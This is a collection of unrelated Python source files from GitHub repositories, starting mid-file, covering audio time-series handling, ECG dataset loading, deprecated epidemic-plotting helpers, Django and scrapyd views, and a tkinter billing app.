plt.figure(figsize=figsize)\n sxx = np.abs(librosa.stft(self.data_arr[0, ::2], center=False, n_fft=2048, hop_length=1024))\n sxx = sxx / np.max(sxx)\n print(sxx.shape, np.max(sxx), np.min(sxx))\n plt.pcolormesh(sxx, shading='gouraud')\n plt.ylabel('Frequency [Hz]')\n plt.xlabel('Time [sec]')\n if save_as is not None:\n plt.savefig(save_as)\n if show:\n plt.show()\n\n def spectrogram2(self):\n import librosa\n from librosa.display import specshow\n s = np.abs(librosa.stft(self.data_arr[0]))\n fig, ax = plt.subplots()\n\n img = specshow(librosa.amplitude_to_db(s, ref=np.max),\n y_axis='log', x_axis='time', sr=self.fs, ax=ax)\n ax.set_title('Power spectrogram')\n fig.colorbar(img, ax=ax, format=\"%+2.0f dB\")\n\n def play(self, channel_id=0, fs: float = None, volume=32):\n import sounddevice as sd\n fs = fs or self.fs\n sd.play(volume * self.data_arr[channel_id].astype('float32'), fs)\n sd.wait()\n\n def to_mp3(self, file, normalized=True, fs=None):\n import pydub\n \"\"\"\n set fs to 44100 if you want\n \"\"\"\n if self.data_arr.ndim not in [1, 2]:\n raise ValueError(f\"This signal has '{self.data_arr.ndim}' channels. Allowed values are 1 or 2.\")\n if normalized: # normalized array - each item should be a float in [-1, 1)\n y = np.int16(self.data_arr.T * 2 ** 15)\n else:\n y = np.int16(self.data_arr.T)\n if fs is None:\n fs = self.fs\n song = pydub.AudioSegment(y.tobytes(), frame_rate=fs, sample_width=2, channels=self.data_arr.shape[0])\n song.export(file, format=\"mp3\", bitrate=\"320k\")\n\n\nclass Signal2D(TimeSeries):\n full_dimensions = 3\n\n def show(self):\n ...\n\n\ndef sum_time_series(series: list[TimeSeries]) -> TimeSeries:\n if len(series) == 0:\n raise ValueError\n elif len(series) == 1:\n return series[0]\n\n ts0 = series[0]\n for ts in series[1:]:\n ts0 = ts0 + ts\n\n return ts0\n\n\ndef stack_time_series(series: list[TimeSeries]) -> TimeSeries:\n new_info = join_dicts(*[i.meta for i in series])\n data_arrs = []\n time_maps = []\n length = len(series[0])\n fs = series[0].fs\n for i in series:\n assert len(i) == length\n assert i.fs is fs or i.fs == fs\n data_arrs.append(i.data_arr)\n time_maps.append(i.time_map)\n\n new_data_arr = np.concatenate(data_arrs, axis=0)\n new_time_map = np.concatenate(time_maps, axis=0)\n\n return type(series[0])(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=fs,\n )\n\n\ndef join_time_series(series: list[TimeSeries]) -> TimeSeries:\n new_info = join_dicts(*[i.meta for i in series])\n data_arrs = []\n time_maps = []\n channels_count = series[0].channels_count\n fs = series[0].fs\n for i in series:\n assert i.channels_count == channels_count\n assert i.fs is fs or i.fs == fs\n data_arrs.append(i.data_arr)\n time_maps.append(i.time_map)\n\n new_data_arr = np.concatenate(data_arrs, axis=-1)\n new_time_map = np.concatenate(time_maps, axis=-1)\n\n return type(series[0])(\n data_arr=new_data_arr,\n meta=new_info,\n time_map=new_time_map,\n fs=fs,\n )\n\n\ndef audio_file2numpy(file) -> tuple[np.ndarray, int]:\n from pydub import AudioSegment\n from pydub.utils import mediainfo\n file = Path(file)\n suffix = file.suffix\n file = str(file.absolute())\n if suffix == '.wav':\n audio = AudioSegment.from_wav(file)\n elif suffix == '.mp3':\n audio = AudioSegment.from_mp3(file)\n elif suffix == '.aac':\n audio = AudioSegment.from_file(file, \"aac\")\n else:\n raise TypeError(f\"Suffix '{suffix}' is not supported yet!\")\n\n np_audio = np.array(audio.get_array_of_samples(), dtype=np.float32).reshape((-1, audio.channels)) / (\n 1 << (8 * 
audio.sample_width - 1)), audio.frame_rate\n return np_audio[0].T, int(mediainfo(file)['sample_rate'])\n\n\ndef read_audio(filename, interval: tuple[int, int] = None, dtype=None, fs: float = None, meta=None) -> Signal:\n \n data_arr, fs_ = audio_file2numpy(filename)\n if fs is not None and fs != fs_:\n raise ValueError(f'fs is wrong in config (from config) {fs}!={fs_} (from audio)')\n if dtype is not None:\n data_arr = data_arr.astype(dtype)\n\n s = Signal(data_arr=data_arr, fs=fs_, meta=meta)\n if interval is not None:\n return s.crop(interval)\n\n return s\n\n\ndef read_bin(filename, interval: tuple[int, int] = None, source_dtype='float32', dtype=None, meta=None,\n fs: float = None) -> Signal:\n with open(filename, \"rb\") as f:\n start_byte = int(DTYPE_BYTES[source_dtype] * interval[0]) if interval is not None else 0\n assert start_byte % DTYPE_BYTES[source_dtype] == 0, \"Bytes are not loading properly.\"\n f.seek(start_byte, 0)\n count = (interval[1] - interval[0]) if interval is not None else -1\n data_arr = np.expand_dims(np.fromfile(f, dtype=source_dtype, count=count), axis=0)\n if dtype is not None:\n data_arr = data_arr.astype(dtype)\n return Signal(data_arr=data_arr, meta=meta, fs=fs)\n\n\ndef from_numpy(data_arr: np.ndarray, interval: tuple[int, int] = None, dtype=None, fs: float = None, meta=None) -> TimeSeries:\n assert isinstance(data_arr, np.ndarray), f\"data_arr must be a numpy.ndarray, not '{type(data_arr)}'\"\n if len(data_arr.shape) == 1:\n data_arr = np.expand_dims(data_arr, axis=0)\n if interval is not None:\n data_arr = data_arr[..., interval[0]: interval[1]]\n if dtype is not None:\n data_arr = data_arr.astype(dtype)\n\n if len(data_arr.shape) == 2:\n return Signal(data_arr=data_arr, meta=meta, fs=fs)\n elif len(data_arr.shape) == 3:\n return Signal2D(data_arr=data_arr, meta=meta, fs=fs)\n else:\n raise ValueError(f\"Loaded array has {len(data_arr.shape)} channels, maximum is 3.\")\n\n\ndef read_npy(filename: str | pathlib.PosixPath, interval: tuple[int, int] = None, dtype=None, fs: float = None, meta=None) -> TimeSeries:\n full_data_arr = np.load(filename)\n return from_numpy(\n data_arr=full_data_arr,\n interval=interval,\n dtype=dtype,\n fs=fs,\n meta=meta,\n )\n","repo_name":"AIKovanda/signalai","sub_path":"src/signalai/time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":17029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"23726085936","text":"import ast\nimport numpy as np\nimport wfdb\nimport pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder, MinMaxScaler\nimport os\nimport joblib\n\ndef loadDatabase(csv:str) -> pd.DataFrame:\n \"\"\"\n Renvoie un Dataframe à partir du fichier base de donnée csv ptbxl\n \"\"\"\n df = pd.read_csv(csv, index_col='ecg_id', header=0)\n df.scp_codes = df.scp_codes.apply(lambda x: ast.literal_eval(x)) # eval json array\n return df\n\ndef loadSample(path:str, df: pd.DataFrame, samplerate=100):\n \"\"\"\n Renvoie un tableau de tableau des signaux de tous les patients et les metadonnées\n [[patient1], [patient2], ...]\n [patient1] = [[I], [II], ..., [V3]]\n \"\"\"\n if samplerate == 100:\n data = [wfdb.rdsamp(path+f) for f in df.filename_lr]\n elif samplerate == 500:\n data = [wfdb.rdsamp(path+f) for f in df.filename_hr]\n else:\n return Exception('Invalid parameter ' + str(samplerate))\n raw = []\n metas = []\n for signal, meta in data:\n #raw.append(np.array(signal).flatten(order='F').reshape(meta['n_sig'], meta['sig_len']))\n 
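# wfdb.rdsamp yields (signal, fields); signal is already a (sig_len, n_sig) array\n 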
raw.append(signal)\n metas.append(meta)\n return (np.array(raw), np.array(metas))\n\ndef loadStatement(csv:str):\n \"\"\"\n Load statement\n \"\"\"\n df = pd.read_csv(csv, index_col=None)\n return df\n\ndef createYArray(statement:pd.DataFrame, db:pd.DataFrame, save_dir='./', use_only_diag=True, use_most=-1):\n \"\"\"One-hot encode les diagnostics -> un vecteur de dimension 71 pour chaque diag\n Sauvergarde l'encodeur pour décoder la prédiction\n\n Args:\n statement (pd.DataFrame): Les diagnostics\n db (pd.DataFrame): La base de donnés en csv\n save_dir (str, optional): Le dossier de sauvegarde. Defaults to 'cache/'.\n\n Returns:\n np.array: Un tableau de tableau de vecteurs de dimension len(statement)\n \"\"\"\n if os.path.exists(save_dir) == False:\n os.mkdir(save_dir)\n\n if use_only_diag:\n statement = statement[statement.diagnostic == 1]\n\n #create list of most 'used' labels and take use_most of them\n only_labels=[]\n if use_most > 0:\n freq = {}\n for codes in db.scp_codes:\n mk = max(codes, key=codes.get)\n if mk in freq:\n freq[mk] += 1\n else:\n freq[mk] = 1\n freq = sorted(freq.items(), key=lambda item: item[1], reverse=True)\n for i in range(use_most):\n only_labels.append(freq[i][0])\n only_labels.append('OTHER')\n\n enc = OneHotEncoder()\n labels = statement.iloc[:,0].to_numpy() if not only_labels else np.array(only_labels)\n enc.fit(labels.reshape(-1, 1))\n\n joblib.dump(enc, save_dir+'encoder.save')\n\n Y = []\n for codes in db.scp_codes:\n tmp = np.zeros(len(labels))\n max_key = max(codes, key=codes.get)\n if max_key in labels:\n tmp = np.add(tmp, enc.transform([[max_key]]).toarray()[0])\n else:\n tmp = np.add(tmp, enc.transform([['OTHER']]).toarray()[0])\n #for key in codes.keys():\n # if key in labels:\n # tmp = np.add(tmp, enc.transform([[key]]).toarray()[0] * codes[key] / 100)\n # else:\n # tmp += enc.transform([['NORM']])\n Y.append(tmp)\n\n return np.array(Y)\n\ndef collectData(db_dir, samples_file, metas_file, y_file, use_saved=True, use_most=-1):\n \"\"\"Charge les données à partir de celles sauvergardés ou en les créant\n\n Args:\n db_dir (str): dossier de la base de donnée\n samples_file (str): emplacement du fichier de sauvegarde des samples\n metas_file (str): emplacement du fichier de sauvegarde des metadonnés\n y_file (str): emplacement du fichier de sauvergarde des labels\n use_saved (bool, optional): Utilise ou non la sauvegarde. 
Defaults to True.\n\n Returns:\n Tuple: Renvoie les samples, labels et métadonnés\n \"\"\"\n db = loadDatabase(db_dir + 'ptbxl_database.csv')\n stat = loadStatement(db_dir + 'scp_statements.csv')\n\n # Charge les données déjà traitées si elles existent\n\n if use_saved and os.path.exists(samples_file):\n print('Chargement des données ', end='', flush=True)\n\n samples = joblib.load(samples_file)\n metas = joblib.load(metas_file)\n Y = joblib.load(y_file)\n print('[OK]')\n else:\n print('Création des données ', end='', flush=True)\n samples, metas = loadSample(db_dir, db)\n Y = createYArray(stat, db, use_most=use_most)\n joblib.dump(samples, samples_file, compress=3)\n joblib.dump(metas, metas_file)\n joblib.dump(Y, y_file, compress=3)\n print('[OK]')\n ######################################################################\n\n return samples, Y, metas","repo_name":"DrBlackApple/TIPE","sub_path":"databuilder.py","file_name":"databuilder.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21340437782","text":"## NB: this module is deprecated and will be removed soon\n\n# all necessary (available) output functions are in output_disease and output_statistics\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ntry:\n import brewer2mpl as brew\n\n colors = ['k'] + brew.get_map('Dark2', 'qualitative', 8).mpl_colors # Set1\nexcept ImportError:\n colors = ['b', 'r', 'g', 'm', 'c', 'k', '0.5']\n\n\nclass lp(object):\n lw = 1\n\n\n## general / helper functions # - # - # - # - # - # - # - # - # - # - # - # \n\ndef setup_x_axis_years(ax, times, offset=0, set_xlim=True):\n #print \"s\", offset\n years_per_tick = (times['et'] - times['st']) / (times['t_per_year'] * 5)\n # why is this divided by 10?, it produces an error if want a range of less than 10 years [can't work out why]\n if set_xlim:\n ax.set_xlim(times['st'], times['et'])\n ax.set_xticks(list(range(times['st'],\n times['et'] + (times['t_per_year'] * years_per_tick),\n times['t_per_year'] * years_per_tick)))\n ax.set_xticklabels(list(range(offset + times['st'] / times['t_per_year'],\n offset + times['et'] / times['t_per_year'] + 1,\n years_per_tick)))\n ax.set_xlabel('Year')\n\n\ndef setup_x_axis_days(ax, times, xmin=0):\n days_per_tick = (times['et'] - times['st']) / (times['t_per_year'] / 364.0 * 6)\n ax.set_xlim(times['st'], times['et'])\n t_per_day = times['t_per_year'] / 364.0\n xtics = np.arange(times['st'], times['et'], t_per_day * days_per_tick, dtype=np.int)\n ax.set_xticks(xtics)\n xticlabels = xtics - times['st'] + (xmin if xmin else 0) # effectively, handle offset\n xticlabels /= t_per_day\n ax.set_xticklabels(xticlabels)\n ax.set_xlabel('Day')\n\n\ndef setup_x_axis(ax, times, xmin=0, set_xlim=True):\n # if duration is less than one year, show x axis as days\n if times['et'] - times['st'] <= times['t_per_year']:\n setup_x_axis_days(ax, times, xmin)\n else:\n setup_x_axis_years(ax, times, xmin, set_xlim)\n\n\n## OLD functions # - # - # - # - # - # - # - # - # - # - # - # - # - # - # - #\n\ndef plot_infection(ax, series, y_errs, start_index, end_index,\n start_time, end_time, ylabel=\"Proportion infected\", interval=1):\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n xvals = np.linspace(start_time, end_time, len(series[0]))\n for i, cur_counts in enumerate(series):\n print((len(yvals)))\n if len(yvals) < len(xvals):\n yvals.extend([0] * (len(xvals) - len(yvals)))\n ax.plot(xvals, yvals, color=colors[i], 
lw=lp.lw)\n ax.set_ylabel(ylabel)\n\n\ndef plot_infection_multi(ax, inc_mean, inc_std, start_index, end_index,\n start_time, end_time, t_dur, label=\"\", color='k'):\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n yvals = list(inc_mean[start_index:end_index])\n xvals = list(range(start_time, end_time, t_dur))\n yerr = list(inc_std[start_index:end_index])\n if len(yvals) < len(xvals):\n yvals.extend([0] * (len(xvals) - len(yvals)))\n if len(yerr) < len(xvals):\n yerr.extend([0] * (len(xvals) - len(yerr)))\n ax.errorbar(xvals, yvals, label=label, yerr=yerr, color=color)\n ax.set_ylim(ymin=0.0)\n ax.set_ylabel('Incidence')\n\n\ndef plot_vaccine_coverage(ax, data, start_time, end_time, t_per_year, start_index,\n logscale=False):\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n # print \"%%% IN plot_vaccine_coverage %%%\"\n # print start_index\n #print start_time, end_time \n xvals = list(range(start_time, end_time, t_per_year))\n #print xvals\n #print len(xvals)\n for cur_cov in data:\n #print cur_cov[0]\n yvals = cur_cov[1][start_index:]\n #print len(yvals)\n ax.plot(xvals, yvals, label=cur_cov[0])\n if logscale: ax.set_yscale('log')\n ax.set_ylabel('Coverage')\n ax.set_ylim((0, 1))\n leg = ax.legend(loc=2)\n leg.get_frame().set_alpha(0.0)\n\n\ndef plot_states(ax, props, times, logscale=False, marker=-1, pop_size=-1):\n xvals = np.arange(times['st'], times['et'])\n\n print(\"************* SUPERCEDED BY output_timeseries\")\n\n if marker > 0:\n ax.vlines(marker, 0.0005, 1, color='g')\n leg_labels = []\n for i, p in enumerate(props):\n yvals = list(p[2][times['si']:times['ei']])\n if len(yvals) < len(xvals):\n yvals.extend([0] * (len(xvals) - len(yvals)))\n ax.plot(xvals, yvals, color=colors[i])\n leg_labels.append(p[0])\n if logscale:\n ax.set_yscale('log')\n ymin = 1.0 / pop_size if pop_size > 0 else 0.0001\n ax.set_ylim((ymin, 1.0))\n leg = ax.legend(leg_labels, bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n ncol=len(props), mode=\"expand\", borderaxespad=0.)\n\n ax.set_ylabel('Fraction of population')\n\n\ndef plot_introductions(ax, times, start_time, end_time):\n colours = ['b', 'g', 'r', 'c', 'm', 'y', '0.25']\n for cur_size in range(1, 8):\n xvals = [x[1] for x in times if start_time < x[1] < end_time \\\n and x[0] == cur_size or (cur_size >= 7 and x[0] >= cur_size)]\n if len(xvals) > 0:\n ax.scatter(xvals, [0.001] * len(xvals), c=colours[cur_size - 1],\n marker='d', edgecolors='none')\n\n\ndef plot_hh_case_props(ax, props, start_index, end_index,\n start_time, end_time, t_dur):\n xvals = [x for x in zip(*props)[0] if x > start_time]\n i_begin = len(props) - len(xvals)\n\n tprops = list(zip(*props))\n colours = ['b', 'g', 'r', 'c', 'm', 'y', '0.25']\n b = np.zeros(len(tprops[1][i_begin:]))\n for i in range(1, len(tprops)):\n ax.bar(xvals, tprops[i][i_begin:], color=colours[i - 1], bottom=b,\n align='center', linewidth=0, width=16)\n b += tprops[i][i_begin:]\n\n # ax.plot(xvals, zip(*props)[1][i_begin:], c='b')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[2][i_begin:], c='g')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[3][i_begin:], c='r')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[4][i_begin:], c='c')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[5][i_begin:], c='m')#, edgecolors='none')\n # ax.plot(xvals, zip(*props)[6][i_begin:], c='y')#, edgecolors='none')\n\n ax.set_ylabel('Number of cases by household size')\n\n\ndef plot_immunity_by_hh_size(ax, rates, start_index, end_index, start_time,\n end_time, t_dur):\n 
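# deprecated with the rest of this module (see the note at the top of the file)\n 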
print(\"************* SUPERCEDED BY output_timeseries\")\n\n for i, cur_size in enumerate(zip(*rates)):\n xvals = list(range(start_time, end_time + 1, t_dur))\n yvals = list(cur_size[start_index:end_index])\n print(t_dur)\n print(xvals)\n print((len(xvals), len(yvals)))\n if len(yvals) < len(xvals):\n yvals.extend([yvals[-1]] * (len(xvals) - len(yvals)))\n ax.plot(xvals, yvals, color=colors[i])\n leg_labels = ['%d' % (x + 1) for x in range(len(list(zip(*rates))))]\n leg_labels[-1] += '+'\n leg = ax.legend(leg_labels, loc=3, ncol=2, title='Household size',\n labelspacing=0.2, columnspacing=0.4, handletextpad=0.2)\n leg.get_frame().set_alpha(0.0)\n plt.setp(leg.get_texts(), fontsize='small')\n\n\ndef plot_inc_over_time(ax, data, age_bins, times, ylabel, ymax=-1, units='years'):\n leg_labels = ['%d-%d %s' % (x, y, units) \\\n for x, y in zip(age_bins[:-1], age_bins[1:])]\n for i, x in enumerate(zip(*data)):\n x_val = list(range(times['st'], times['et'], (times['et'] - times['st']) / len(x)))\n print((times['st'], times['et'], len(x_val), len(x)))\n print(x_val)\n ax.plot(x_val, x, color=colors[i % len(colors)])\n if ymax > 0:\n ax.set_ylim(ymax=ymax)\n leg = ax.legend(leg_labels) #, prop={'size':'large'})\n leg.get_frame().set_alpha(0.0)\n ax.set_ylabel(ylabel)\n\n\ndef plot_hh_fracs(ax, data, c='b', t_step=1):\n # print data\n d = list(zip(*data))\n x = np.array(d[0]) * t_step\n y = np.array(d[1])\n # print np.mean(y)\n ax.plot(x, y, color=c)\n ax.set_ylabel(\"Household fraction\")\n # ax.set_ylim(ymax=0.5)\n ax.set_ylim(ymin=0)\n\n\ndef plot_susc_prop(ax, data, c, times):\n # plots a single output series\n print(times)\n xvals = list(range(times['st'], times['et'] + 1, 1)) #364/times['t_per_year'])\n yvals = data\n print((len(xvals), len(yvals)))\n if len(yvals) < len(xvals):\n yvals.extend([yvals[-1]] * (len(xvals) - len(yvals)))\n ax.plot(xvals, yvals, color=c, marker='o', markeredgewidth=0, markersize=3)\n ax.set_yscale('log')\n ax.set_ylim(ymin=1e-4, ymax=1)\n\n\ndef plot_susc_props(ax, data, times):\n # plots a single output figure\n for i in range(0, max(data.keys()) + 1):\n plot_susc_prop(ax, data[i], colors[i], times)\n leg = ax.legend(list(range(0, max(data.keys()) + 1)), title='Number Susceptible') #, prop={'size':'large'})\n leg.get_frame().set_alpha(0.0)\n\n\ndef plot_hh_fracs_by_hh_size(ax, data, t_step=1):\n for i in range(1, 8):\n if data[i]:\n plot_hh_fracs(ax, data[i], colors[i - 1], t_step=t_step)\n\n\ndef plot_hh_fracs_multi(ax, hhf_mean, hhf_sd, label=\"\", color='b'):\n ax.set_xlabel(\"Days\")\n ax.set_ylabel(\"Household fraction\")\n xvals = list(range(len(hhf_mean)))\n if hhf_sd:\n ax.errorbar(xvals, hhf_mean, yerr=hhf_sd, label=label, color=color)\n else:\n ax.plot(xvals, hhf_mean, label=label, color=color)\n ax.set_ylim(ymin=0.0)\n\n\ndef plot_infection_immunity(ax, counts, ab, start_index, start_time=0,\n points_per_year=52, years_per_tick=5):\n plot_infection(ax, counts, start_index, start_time,\n points_per_year, years_per_tick)\n ax2 = ax.twinx()\n ax2.plot(list(range(start_index + start_time, start_time + len(ab))),\n ab[start_index:])\n ax2.set_ylabel('Mean antibody level')\n ax.set_xlim(xmin=start_index + start_time, xmax=start_time + len(counts))\n ax.set_xticks(list(range(start_index + start_time, start_time + len(counts),\n points_per_year * years_per_tick)))\n ax.set_xticklabels(list(range(0, len(counts) / points_per_year, years_per_tick)))\n\n\ndef plot_cases(ax, counts, bins, xlabel):\n ax.bar(bins[:-1] - 0.4, counts, width=0.8)\n 
ax.set_xlabel(xlabel)\n ax.set_ylabel('Cases')\n ax.set_xlim(xmin=-0.5)\n\n\ndef plot_incidence_line(ax, counts, errs, xlabel, label=None, color='b'):\n ax.plot(list(range(len(counts))), counts, label=label, lw=1.5, color=color)\n if errs is not None:\n ax.errorbar(list(range(len(counts))), counts, yerr=errs, color=color, capsize=0, alpha=0.4)\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Incidence')\n ax.set_ylim(ymin=0.0)\n ax.set_xlim(xmax=100)\n\n\ndef plot_incidence(ax, counts, state_labels, bins, xlabel,\n labels=None, y_max=-1, x_max=-1):\n b = np.zeros(len(counts[state_labels[0]]))\n for i, label in enumerate(state_labels):\n if label not in counts: continue\n ax.bar(bins[:-1], counts[label], color=colors[i], bottom=b,\n align='center', linewidth=0, width=0.8)\n b += counts[label]\n\n # ax.bar(bins[:-1]-0.4, counts, width=0.8)\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Incidence')\n ax.set_xlim(xmin=bins[0] - 0.5)\n if x_max > 0:\n ax.set_xlim(xmax=x_max)\n else:\n ax.set_xlim(xmax=bins[-1] - 0.5)\n\n if labels:\n ax.set_xticks(list(range(len(labels))))\n ax.set_xticklabels(labels)\n\n if y_max > 0:\n ax.set_ylim(ymax=y_max)\n\n\ndef plot_age_inc_diffs(ax, counts):\n ax.bar(list(range(len(counts))), counts, align='center', linewidth=0, width=0.8)\n\n\ndef plot_inc_total_sweep(ax, means, stdevs, param_values):\n xvals = list(range(len(param_values)))\n ax.bar(xvals, means, yerr=stdevs, align='center')\n ax.set_xticks(xvals)\n ax.set_xticklabels([str(x) for x in param_values])\n ax.set_ylabel('Cases')\n\n\ndef plot_ab_snapshot(ax, snapshot, binsize=5):\n binned = []\n cur_bin = []\n for i, x in list(snapshot.items()):\n # print i, x\n cur_bin.extend(x)\n if i % binsize == 0:\n binned.append(cur_bin)\n cur_bin = []\n # print binned\n\n ax.boxplot(binned, positions=list(range(0, len(binned)))) #, widths=3)\n ax.set_xlabel('Age')\n ax.set_ylabel('Antibody level')\n\n\ndef bin_ab_level(snapshot, cutoffs=(5, 62.5, 125),\n bins=(1, 2, 3, 4, 5, 6, 7, 8, 9, 14, 19, 24, 34, 44, 59, 74)):\n cutoffs = list(cutoffs) + [10000]\n bins = list(bins) + [2000]\n counts = np.zeros((len(bins), len(cutoffs)))\n for cur_age, ab_levels in list(snapshot.items()):\n i = 0\n while cur_age >= bins[i]:\n i += 1\n for ab in ab_levels:\n j = 0\n while ab >= cutoffs[j]:\n j += 1\n counts[i][j] += 1\n\n return counts\n\n\ndef build_ab_legend_labels(cutoffs):\n \"\"\"\n Create a list of series labels based upon cutoffs as follows:\n ['/\", views.MusicianDetailView.as_view()),\n path(\n \"musicians//albums/\",\n views.MusicianAlbumView.as_view(),\n ),\n path(\n \"musicians//albums//songs/\",\n views.MusicianAlbumSongsView.as_view(),\n name=\"create_song\",\n ),\n path(\"schema/\", SpectacularAPIView.as_view(), name=\"schema\"),\n # Opcionais\n path(\n \"schema/swagger-ui/\",\n SpectacularSwaggerView.as_view(url_name=\"schema\"),\n name=\"swagger-ui\",\n ),\n path(\n \"schema/redoc/\",\n SpectacularRedocView.as_view(url_name=\"schema\"),\n name=\"redoc\",\n ),\n]\n","repo_name":"Kenzie-Academy-Brasil-Developers/m5-s6-bandkamp-caiogiffoni","sub_path":"musicians/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73307912737","text":"from uuid import uuid4\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom scrapyd_api import ScrapydAPI\n\nfrom .models import ScrapyItem\n\n# Create your views here.\n\nscrapyd = ScrapydAPI('http://localhost:6800')\n\n\ndef 
get_statements(request):\n unique_id = str(uuid4())\n\n settings = {\n 'unique_id': unique_id\n }\n\n task = scrapyd.schedule('default', 'ibmandiri', settings=settings, to_crawl='otjlsjflask')\n\n return JsonResponse({\n 'task_id': task,\n 'unique_id': unique_id,\n 'status': 'started',\n 'url': '/check_job?unique_id={}&task_id={}'.format(unique_id, task)\n })\n\n\ndef check_job_get_statements(request):\n task_id = request.GET.get('task_id')\n unique_id = request.GET.get('unique_id')\n\n status = scrapyd.job_status('default', task_id)\n if status == 'finished':\n item = ScrapyItem.objects.get(unique_id=unique_id)\n return JsonResponse(item.to_dict())\n return JsonResponse({'status': status})\n\n","repo_name":"ihfazhillah/explore-scrapy","sub_path":"ibanking_web/ibanking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"32691089154","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport json\nimport os\n\nclass Product:\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\nclass InvoiceItem:\n def __init__(self, product, quantity):\n self.product = product\n self.quantity = quantity\n\nclass Customer:\n def __init__(self, name, email):\n self.name = name\n self.email = email\n\nclass BillingApp:\n def __init__(self, root):\n self.root = root\n self.root.title(\"Billing System\")\n\n self.products = []\n self.invoice_items = []\n self.customers = []\n\n # Load existing data from files\n self.load_data()\n\n # Create a label for product name\n self.label_product = tk.Label(root, text=\"Product Name:\")\n self.label_product.pack()\n\n # Create an entry for product name\n self.entry_product = tk.Entry(root)\n self.entry_product.pack()\n\n # Create a label for product price\n self.label_price = tk.Label(root, text=\"Price:\")\n self.label_price.pack()\n\n # Create an entry for product price\n self.entry_price = tk.Entry(root)\n self.entry_price.pack()\n\n # Create a label for quantity\n self.label_quantity = tk.Label(root, text=\"Quantity:\")\n self.label_quantity.pack()\n\n # Create an entry for quantity\n self.entry_quantity = tk.Entry(root)\n self.entry_quantity.pack()\n\n # Create a button to add a product\n self.add_button = tk.Button(root, text=\"Add Product\", command=self.add_product)\n self.add_button.pack()\n\n # Create a listbox to display added products\n self.product_listbox = tk.Listbox(root)\n self.product_listbox.pack()\n\n # Create a label for customer name\n self.label_customer_name = tk.Label(root, text=\"Customer Name:\")\n self.label_customer_name.pack()\n\n # Create an entry for customer name\n self.entry_customer_name = tk.Entry(root)\n self.entry_customer_name.pack()\n\n # Create a label for customer email\n self.label_customer_email = tk.Label(root, text=\"Customer Email:\")\n self.label_customer_email.pack()\n\n # Create an entry for customer email\n self.entry_customer_email = tk.Entry(root)\n self.entry_customer_email.pack()\n\n # Create a button to add a customer\n self.add_customer_button = tk.Button(root, text=\"Add Customer\", command=self.add_customer)\n self.add_customer_button.pack()\n\n # Create a label to display the customer's details\n self.label_customer_details = tk.Label(root, text=\"\")\n self.label_customer_details.pack()\n\n # Create a button to generate an invoice\n self.generate_button = tk.Button(root, text=\"Generate Invoice\", command=self.generate_invoice)\n self.generate_button.pack()\n\n # 
Create a label to display the total amount\n self.label_total = tk.Label(root, text=\"\")\n self.label_total.pack()\n\n # Create a button to save data\n self.save_button = tk.Button(root, text=\"Save Data\", command=self.save_data)\n self.save_button.pack()\n\n def add_product(self):\n name = self.entry_product.get()\n price = float(self.entry_price.get())\n quantity = int(self.entry_quantity.get())\n\n product = Product(name, price)\n item = InvoiceItem(product, quantity)\n\n self.products.append(product)\n self.invoice_items.append(item)\n\n self.product_listbox.insert(tk.END, f\"{name} - ${price:.2f} x {quantity}\")\n\n # Clear input fields\n self.entry_product.delete(0, tk.END)\n self.entry_price.delete(0, tk.END)\n self.entry_quantity.delete(0, tk.END)\n\n def add_customer(self):\n name = self.entry_customer_name.get()\n email = self.entry_customer_email.get()\n\n customer = Customer(name, email)\n self.customers.append(customer)\n\n self.label_customer_details.config(text=f\"Customer: {name} ({email})\")\n # Clear input fields\n self.entry_customer_name.delete(0, tk.END)\n self.entry_customer_email.delete(0, tk.END)\n\n def generate_invoice(self):\n if not self.invoice_items:\n messagebox.showinfo(\"Error\", \"No items in the invoice.\")\n return\n\n total = sum(item.product.price * item.quantity for item in self.invoice_items)\n customer_details = self.label_customer_details.cget(\"text\")\n\n if not customer_details:\n messagebox.showinfo(\"Error\", \"Please add a customer.\")\n return\n\n messagebox.showinfo(\"Invoice\", f\"Invoice for {customer_details}\\nTotal Amount: ${total:.2f}\")\n\n def save_data(self):\n data = {\n \"products\": [(p.name, p.price) for p in self.products],\n \"customers\": [(c.name, c.email) for c in self.customers],\n }\n\n with open(\"billing_data.json\", \"w\") as file:\n json.dump(data, file)\n\n messagebox.showinfo(\"Saved\", \"Data has been saved to billing_data.json\")\n\n def load_data(self):\n if os.path.exists(\"billing_data.json\"):\n with open(\"billing_data.json\", \"r\") as file:\n data = json.load(file)\n\n for name, price in data[\"products\"]:\n self.products.append(Product(name, price))\n\n for name, email in data[\"customers\"]:\n self.customers.append(Customer(name, email))\n\ndef main():\n root = tk.Tk()\n app = BillingApp(root)\n root.mainloop()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ihimanshsharma/Billing_Software","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
